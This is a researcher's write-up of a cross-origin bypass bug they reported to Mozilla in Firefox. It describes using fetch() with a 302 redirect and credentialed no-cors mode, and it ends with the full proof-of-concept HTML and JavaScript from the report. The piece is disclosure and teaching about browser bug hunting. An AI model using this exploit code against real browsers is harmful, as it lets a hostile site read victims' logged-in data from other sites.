This was my first ever (valid) Firefox bug, I must say I was lucky to find it. What I did when I first started finding bugs within the Firefox browser was to read carefully what is actually considered a bug.
One of bugs are Cross-Origin Policy bypasses, essentially there are security measures to prevent say http://yourdomain.ltd
to read data (like document.cookie, or document.body.innerHTML ..etc) from an external website like
http://facebook.com/
as this is obviously dangerous. Because if this was allowed, I could just have you visit my website and behind your back I could read your facebook messages or emails which is a huge privacy concern.
The first thing I did and I suggest everyone who wants to find a bug in a browser like Firefox is to read read read read read read. You have to understand or atleast be aware of different functions in order to test them. A big help to me as well was looking at older valid bug reports.
All you need to do then is to test your crazy theory. I probably went through dozens of failed tests before I stumbled on this bypass, I was just reading the Mozilla documentation on various javascript functions. To make it easier for me at first as there are a lot of javascript functions,
I first targeted only the javascript functions which made HTTP requests, among these was the fetch() api, and after various tests with it, I tried to use an old trick (which has been done before I believe) of trying a 302 redirection. So I would host say a PHP file on my 'evil' website, all it did was redirect to say 'facebook.com' doing so somehow tricked the fetch function.
But it didn't trick all of the fetch function, it was required that certain things were passed alongside the function, which were {mode:'no-cors',credentials: 'include'} these optional passed variables basically told the fetch API to fetch the external document without CORS (AKA Cross Origin Resource Sharing) as well as make sure to send a credentialed request (which sends the request as if you were logged in). Doing both of those things made this bug that more dangerous.
The following will be the exact PoC code I submitted to Mozilla on my report.
<!DOCTYPE html> <html> <head> <title>Firefox x-origin bypass</title> </head> <body> <iframe src='' id='qab'></iframe> <iframe src='//twitter.com/qab'></iframe> <script> var myImage = document.getElementById('qab'); x=fetch('http://localhost/redir.php',{mode:'no-cors',credentials: 'include'}).then(function(response) { return response.blob(); }).then(function(response) {console.dir(res2=response); var objectURL = URL.createObjectURL(response); myImage.src = objectURL; }); </script> </body> </html>